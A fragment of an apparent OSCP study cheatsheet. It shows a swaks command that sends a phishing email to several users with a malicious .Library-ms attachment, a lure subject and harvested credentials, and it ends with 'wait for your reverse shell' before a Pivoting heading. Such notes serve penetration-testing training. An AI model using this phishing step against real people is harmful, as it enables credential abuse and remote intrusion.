douglaskataki/oscp-report-notes/Cheatsheet - Machines.md

 ```
 sudo swaks -t username1@mailserver.com -t user2@mailserver.com --from john@mailserver.com --attach @config.Library-ms --server $mailserver_ip --body @body.txt --header "Subject: Git Vulnerability" --suppress-data -ap
 ```
 You will be asked for a login.
 Enter the credentials founded and send the e-mail.
+Now just wait for your reverse shell

 ## Pivoting